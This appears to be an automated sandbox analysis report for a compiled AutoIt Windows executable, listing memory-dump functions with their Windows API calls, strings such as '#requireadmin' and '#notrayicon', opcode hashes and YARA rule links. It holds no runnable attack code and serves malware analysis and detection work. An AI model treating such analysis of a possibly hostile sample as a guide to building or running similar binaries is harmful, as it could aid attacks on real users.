Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 6b84bfdf54e18702856abbc5c618d304c3e3a44e1e1f505f97796c22ef3eb97b
Instruction ID: 35f689af851d48b23b297469a5e6cdcd184b23bd77c0ed3347058dde8e0c4665
Opcode Fuzzy Hash: 6b84bfdf54e18702856abbc5c618d304c3e3a44e1e1f505f97796c22ef3eb97b
Instruction Fuzzy Hash: 6661AEB0900649EFEF11DFA4D888EAF7BB8EF05318F14055EE441A7292D738AD45CB29

Uniqueness

Uniqueness Score: -1.00%

Function 0043A28D, Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 0043A2AA
SafeArrayAllocData.OLEAUT32(?), ref: 0043A2F5
VariantInit.OLEAUT32(?), ref: 0043A307
SafeArrayAccessData.OLEAUT32(?,?), ref: 0043A327
VariantCopy.OLEAUT32(?,?), ref: 0043A36A
SafeArrayUnaccessData.OLEAUT32(?), ref: 0043A37E
VariantClear.OLEAUT32(?), ref: 0043A393
SafeArrayDestroyData.OLEAUT32(?), ref: 0043A3A0
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0043A3A9
VariantClear.OLEAUT32(?), ref: 0043A3BB
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0043A3C6

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 21894ddde50de7c82e8b2164f79f429ae7314749cfe82c3335f5ff2385399a27
Instruction ID: 925b97069b1bb69924f6717e9e22c1f1cbb45443f4e2af3966b8ad2dfbcab83d
Opcode Fuzzy Hash: 21894ddde50de7c82e8b2164f79f429ae7314749cfe82c3335f5ff2385399a27
Instruction Fuzzy Hash: F2418631D01119AFCB00EFA4DC849DEBF79FF08704F004469F941A3291DB74AA55CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0044B05A, Relevance: 15.3, APIs: 10, Instructions: 317COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0044B137

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: 88df437b564211553143236ff28b3fe86f6c0099079494d0c3a837eb81a64208
Instruction ID: 8f0db28d94eb66cbe0fb7568c9af4914d8337af56168f3de600b92af5dfd23c9
Opcode Fuzzy Hash: 88df437b564211553143236ff28b3fe86f6c0099079494d0c3a837eb81a64208
Instruction Fuzzy Hash: DEC18E75A0121ADFEB00CF99D485BAEB7B4FF08315F20446AEA05E7281C778E941CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0041B86E, Relevance: 13.7, APIs: 9, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 004049CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00404954,00000000), ref: 00404A23

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0041B85B), ref: 0041B926
KillTimer.USER32(00000000,?,00000000,?,?,?,?,0041B85B,00000000,?,?,0041AF1E,?,?), ref: 0041B9BD
DestroyAcceleratorTable.USER32(00000000), ref: 0047E775
DeleteObject.GDI32(00000000), ref: 0047E7EB

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 2402799130-0
Opcode ID: 11d2b3e084a1dc3c3293f2b621e41f33bd992e5c7f9553099dcbcd655da468f8
Instruction ID: 8160c875e14b1fb4cb43d6baaeb1b2ebe7a1b844cc7b1126c2ddb0e53a7a8d8f
Opcode Fuzzy Hash: 11d2b3e084a1dc3c3293f2b621e41f33bd992e5c7f9553099dcbcd655da468f8
Instruction Fuzzy Hash: F761C070514601CFDB25BF16C888BA677F5FB46315F10452FE18686670C738A882DB9D

Uniqueness

Uniqueness Score: -1.00%

Function 0041A599, Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0047E9EA
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0047EA0B
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0047EA20
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0047EA3D
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0047EA64
DestroyCursor.USER32(00000000), ref: 0047EA6F
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0047EA8C
DestroyCursor.USER32(00000000), ref: 0047EA97

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: CursorDestroyExtractIconImageLoadMessageSend
String ID:
API String ID: 3992029641-0
Opcode ID: f193500613c23e6dddbc6a8d376ea59a8dfefad3c4e0e5f50be1eaaf9ca9d33a
Instruction ID: 0224a558bd54233df3c7292c151e9fbe59a47a140958474a8eaf66724716928e
Opcode Fuzzy Hash: f193500613c23e6dddbc6a8d376ea59a8dfefad3c4e0e5f50be1eaaf9ca9d33a
Instruction Fuzzy Hash: 7451AE70601204EFDB20DF6ACC81FAA77B5BB08354F10462AF94A972E0D778EC91DB59

Uniqueness

Uniqueness Score: -1.00%

Function 0041F6B5, Relevance: 13.6, APIs: 9, Instructions: 135COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0047E9A0,00000004,00000000,00000000), ref: 0041F737
ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0047E9A0,00000004,00000000,00000000), ref: 0041F77E
ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0047E9A0,00000004,00000000,00000000), ref: 0047EB55
ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0047E9A0,00000004,00000000,00000000), ref: 0047EBC1

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: e4b3bcade0207122dd00f89c9fa2a2bd1c2e47eadccad4955386ea20e951c7f2
Instruction ID: f21c1cfd960cad480380284eda53b01f6b2c771cc22f193d41f68a4003ae614d
Opcode Fuzzy Hash: e4b3bcade0207122dd00f89c9fa2a2bd1c2e47eadccad4955386ea20e951c7f2
Instruction Fuzzy Hash: 89413D306046809AD73457399CC8AEB7B956B06305F64497FE06B426F1C67CB8CBD71E

Uniqueness

Uniqueness Score: -1.00%

Function 0045C8B7, Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 0045C916
NULL Pointer assignment, xrefs: 0045CCEE, 0045CCFF

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 5b999fea3a3c8fb2c960f9c036f453f0afbf0faae8ba8d9f04ca914577fbc21b
Instruction ID: c10e28eb97cbfd5dd1f9c832a2b46f2dbdb581efaea31293a4b92d582f25ae59
Opcode Fuzzy Hash: 5b999fea3a3c8fb2c960f9c036f453f0afbf0faae8ba8d9f04ca914577fbc21b
Instruction Fuzzy Hash: 47E1B1B1A00319AFDF10DF68D881BAE77B5AF48315F14402EED45A7382D778AD49CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0045BF80, Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 264COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0045BFD4
VariantInit.OLEAUT32(?), ref: 0045C0A5
VariantInit.OLEAUT32(?), ref: 0045C1A6
VariantClear.OLEAUT32(?), ref: 0045C1B0
VariantClear.OLEAUT32(?), ref: 0045C211

Strings

Incorrect Object type in FOR..IN loop, xrefs: 0045C189
Null Object assignment in FOR..IN loop, xrefs: 0045C035, 0045C163, 0045C21F

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: 449d574cd073cf2ed164120b077622e89628c5d9c4000e85c181dab808c3617f
Instruction ID: c115ecc38c976f8a814cd4ddce92e2a21758ca78a9de236d3c4dfb4deb03b86c
Opcode Fuzzy Hash: 449d574cd073cf2ed164120b077622e89628c5d9c4000e85c181dab808c3617f
Instruction Fuzzy Hash: F891B171E00315AFCB24DFA5C884FAF77B8AF44715F10845AF905AB282D7789945CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 004045A7, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 211COMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 004045F0
UnregisterHotKey.USER32(?), ref: 004047BD
DestroyWindow.USER32(?), ref: 00475936
FreeLibrary.KERNEL32(?), ref: 0047599D
VirtualFree.KERNEL32(?,00000000,00008000), ref: 004759CA

Strings

close all, xrefs: 004045EB

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
String ID: close all
API String ID: 4174999648-3243417748
Opcode ID: 1b4be1fa1339b3c216f0cc8658ded81df101ab545a6d164194e090d5d9adc76f
Instruction ID: d01045b58096f47b249d625df553115f399edb9f4012ba49edd70c3efd613eff
Opcode Fuzzy Hash: 1b4be1fa1339b3c216f0cc8658ded81df101ab545a6d164194e090d5d9adc76f
Instruction Fuzzy Hash: F3916174600502CFC719EF15C999A69F3A4FF05304F5041BEE50AA72E2DB78AD66CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00446237, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 004462D6

Strings

blank, xrefs: 00446258
warning, xrefs: 004462BF
info, xrefs: 00446277
stop, xrefs: 004462A7
question, xrefs: 0044628F

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 306291b920dea9bd7f65389125842fa50a5ef0d1e0c0ea710680f470b2cbe414
Instruction ID: a299e52bffb3385e25708d27a1d8b545009443f5d11d77133b763bdf2bfa360f
Opcode Fuzzy Hash: 306291b920dea9bd7f65389125842fa50a5ef0d1e0c0ea710680f470b2cbe414
Instruction Fuzzy Hash: 5811D831308352BEF7056A559C42EAB67A8BF17724B21006FF501666C2E7ECBA41426E

Uniqueness

Uniqueness Score: -1.00%

Function 0044757B, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000066,?,00000100,00000000), ref: 00447595
LoadStringW.USER32(00000000), ref: 0044759C
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 004475B2
LoadStringW.USER32(00000000), ref: 004475B9
_wprintf.LIBCMT ref: 004475DF
MessageBoxW.USER32(00000000,?,?,00011010), ref: 004475FD

Strings

%s (%d) : ==> %s: %s %s, xrefs: 004475DA

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: b2ba07433500bc2548c00e1fe8c9346a29a1025ec88bedd5b4e50cc7f430813c
Instruction ID: 19bae1cce24bfb3c47662690b11f07110d4484ecbd461760fd820b84949b962d
Opcode Fuzzy Hash: b2ba07433500bc2548c00e1fe8c9346a29a1025ec88bedd5b4e50cc7f430813c
Instruction Fuzzy Hash: CE018BF2D00208BFE711A794ED8DEEB376CDB04311F400866B705D2041EA749EC54B39

Uniqueness

Uniqueness Score: -1.00%

Function 0042B72C, Relevance: 12.1, APIs: 8, Instructions: 118COMMON

Download Yara Rule

APIs

__mtinitlocknum.LIBCMT ref: 0042B744

Part of subcall function 00428A0C: __FF_MSGBANNER.LIBCMT ref: 00428A21
Part of subcall function 00428A0C: __NMSG_WRITE.LIBCMT ref: 00428A28
Part of subcall function 00428A0C: __malloc_crt.LIBCMT ref: 00428A48

__lock.LIBCMT ref: 0042B757
__lock.LIBCMT ref: 0042B7A3
InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,004B6948,00000018,00436C2B,?,00000000,00000109), ref: 0042B7BF
RtlEnterCriticalSection.NTDLL(8000000C), ref: 0042B7DC
RtlLeaveCriticalSection.NTDLL(8000000C), ref: 0042B7EC

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
String ID:
API String ID: 1422805418-0
Opcode ID: e6ce78b60f7cf9928e54c32a08aa697737f3b751f2c38d10ea1f6cd4ca77d33b
Instruction ID: 654273284555ba92f8796a396e4357cff27acb513ce28874abb72e509f4784e6
Opcode Fuzzy Hash: e6ce78b60f7cf9928e54c32a08aa697737f3b751f2c38d10ea1f6cd4ca77d33b
Instruction Fuzzy Hash: B8410A71F002258BEB10AF69E84476DB7A4EF41325F90822ED429AB2D1D77898418BDD

Uniqueness

Uniqueness Score: -1.00%

Function 0041B40F, Relevance: 10.7, APIs: 7, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d512b78c499562c8401047c5e1b403fee9c4f294efd41e8c43c313bc766efea4
Instruction ID: 3b2b72863752280c8c6b0954515b08213f422e258b3bd64687f6628f4ee9a987
Opcode Fuzzy Hash: d512b78c499562c8401047c5e1b403fee9c4f294efd41e8c43c313bc766efea4
Instruction Fuzzy Hash: 5E714C71900109FFCB05CF99CC44AEEBB75FF89318F14C55AF915AA291C7389A42CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00442FCD, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00442FE0
__wcsnicmp.LIBCMT ref: 00443001
__wcsnicmp.LIBCMT ref: 0044301B

Strings

#OnAutoItStartRegister, xrefs: 00443015
#notrayicon, xrefs: 00442FD8
#requireadmin, xrefs: 00442FFB

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: f2e11bbcaeab910ced774a51438355ed6f2f02994bca2300a6726f26fd172961
Instruction ID: 3c064ff8972720532990925b2524d5ac9742f7c7a6bbcd0a2ebfd8ae59f1d9b8
Opcode Fuzzy Hash: f2e11bbcaeab910ced774a51438355ed6f2f02994bca2300a6726f26fd172961
Instruction Fuzzy Hash: F6214C3120412176E730BE35AD02FB773E89F55709F90412BF44587285EBDD9A82D29D

Uniqueness

Uniqueness Score: -1.00%

Function 0046E13E, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0046E14D
_memset.LIBCMT ref: 0046E15C
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,004C3EE0,004C3F24), ref: 0046E18B
CloseHandle.KERNEL32 ref: 0046E19D

Strings

>L, xrefs: 0046E147
$?L, xrefs: 0046E156

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID: $?L$>L
API String ID: 3277943733-1725148090
Opcode ID: 342d708dd3539dae6eb3f0b5cd703190e731074ecda9101c526407551b4c7281
Instruction ID: 5a8b3a69a0a022ac50eb3692a5367908a7930b7c38b1bd6c8a97508b1a6b6485
Opcode Fuzzy Hash: 342d708dd3539dae6eb3f0b5cd703190e731074ecda9101c526407551b4c7281
Instruction Fuzzy Hash: 5FF054F5A40310BEE3506F65AC05FB77A6CDB05355F008839BE04D51A1D3BA4E0097AC

Uniqueness

Uniqueness Score: -1.00%

Function 0041C697, Relevance: 9.3, APIs: 6, Instructions: 253COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 0041C6C0
GetWindowRect.USER32(?,?), ref: 0041C701
ScreenToClient.USER32(?,?), ref: 0041C729
GetClientRect.USER32(?,?), ref: 0041C856
GetWindowRect.USER32(?,?), ref: 0041C86F

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 83ee5f288e7ae5e9819ffa450981f005b246e37cb5d5e2bb4f4c6d5fa29c078d
Instruction ID: 53e2992d00deb4c60a244612ed53788ec16b11d30bb5c8c8f94dd9a98c3f8df8
Opcode Fuzzy Hash: 83ee5f288e7ae5e9819ffa450981f005b246e37cb5d5e2bb4f4c6d5fa29c078d
Instruction Fuzzy Hash: D9B15C3990024ADBDB10CFA9C9807EEB7B1FF08310F14956AEC59EB750DB74A981CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00449569, Relevance: 9.2, APIs: 6, Instructions: 204COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004496BC
_memmove.LIBCMT ref: 004495F7

Part of subcall function 004084A6: __swprintf.LIBCMT ref: 004084E5
Part of subcall function 004084A6: __itow.LIBCMT ref: 00408519

Part of subcall function 0042010A: _malloc.LIBCMT ref: 00420122

_memmove.LIBCMT ref: 0044966A
_memmove.LIBCMT ref: 00449751
_memmove.LIBCMT ref: 0044976A
_memmove.LIBCMT ref: 00449786

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: _memmove$__itow__swprintf_malloc
String ID:
API String ID: 83262069-0
Opcode ID: a6596f675ec6b40a5928b08ee159ca7fe485536372524fd3a225e8330faaf814
Instruction ID: 75624ec79c070602ca2aefe10b399de1b67e56747e4b5edd9a53c3f216ddcd87
Opcode Fuzzy Hash: a6596f675ec6b40a5928b08ee159ca7fe485536372524fd3a225e8330faaf814
Instruction Fuzzy Hash: 33619D3050025A9BDB01EF61CD82EFF37A5AF04308F45456EF85A6B292EB3CAD05DB59

Uniqueness

Uniqueness Score: -1.00%

Function 0041DB8C, Relevance: 9.2, APIs: 6, Instructions: 160COMMON

Download Yara Rule

APIs

_wcscpy.LIBCMT ref: 0041DCC0
_wcscat.LIBCMT ref: 0041DCC7
_wcscpy.LIBCMT ref: 00473CCB

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
